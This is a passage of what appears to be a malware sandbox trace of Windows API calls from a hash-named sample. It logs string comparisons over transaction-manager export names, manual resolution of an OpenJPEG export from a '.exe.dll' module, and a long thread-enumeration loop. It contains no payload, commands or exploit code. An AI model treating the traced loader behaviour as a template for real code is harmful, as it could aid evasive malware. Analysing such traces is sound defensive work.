lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0273.433] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0273.434] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0273.434] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0273.435] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0273.435] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0273.436] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0273.436] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0273.436] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0273.437] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0273.565] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0273.566] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0273.566] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0273.567] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0273.568] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0273.569] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0273.569] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0273.569] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0273.569] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0273.571] GetProcessHeap () returned 0x400000 [0273.571] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c35030 | out: hHeap=0x400000) returned 1 [0273.583] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0273.583] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0273.584] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1000) returned 0x2c35030 [0273.586] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2a) returned 0x418810 [0273.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_get_decoded_tile", cchWideChar=-1, lpMultiByteStr=0x418810, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_get_decoded_tile", lpUsedDefaultChar=0x0) returned 21 [0273.586] GetLastError () returned 0x0 [0273.586] SetLastError (dwErrCode=0x0) [0273.586] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_decoded_tileW") returned 0x0 [0273.586] GetLastError () returned 0x7f [0273.586] SetLastError (dwErrCode=0x7f) [0273.586] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_decoded_tileA") returned 0x0 [0273.587] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_get_decoded_tile") returned 0x7ffc45f19ed0 [0273.587] GetActiveWindow () returned 0x0 [0273.587] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c35030 | out: hHeap=0x400000) returned 1 [0273.587] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418810 | out: hHeap=0x400000) returned 1 [0273.587] GetCurrentProcessId () returned 0x11d8 [0273.587] GetCurrentThreadId () returned 0x4cc [0273.587] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0273.596] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0273.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.333] 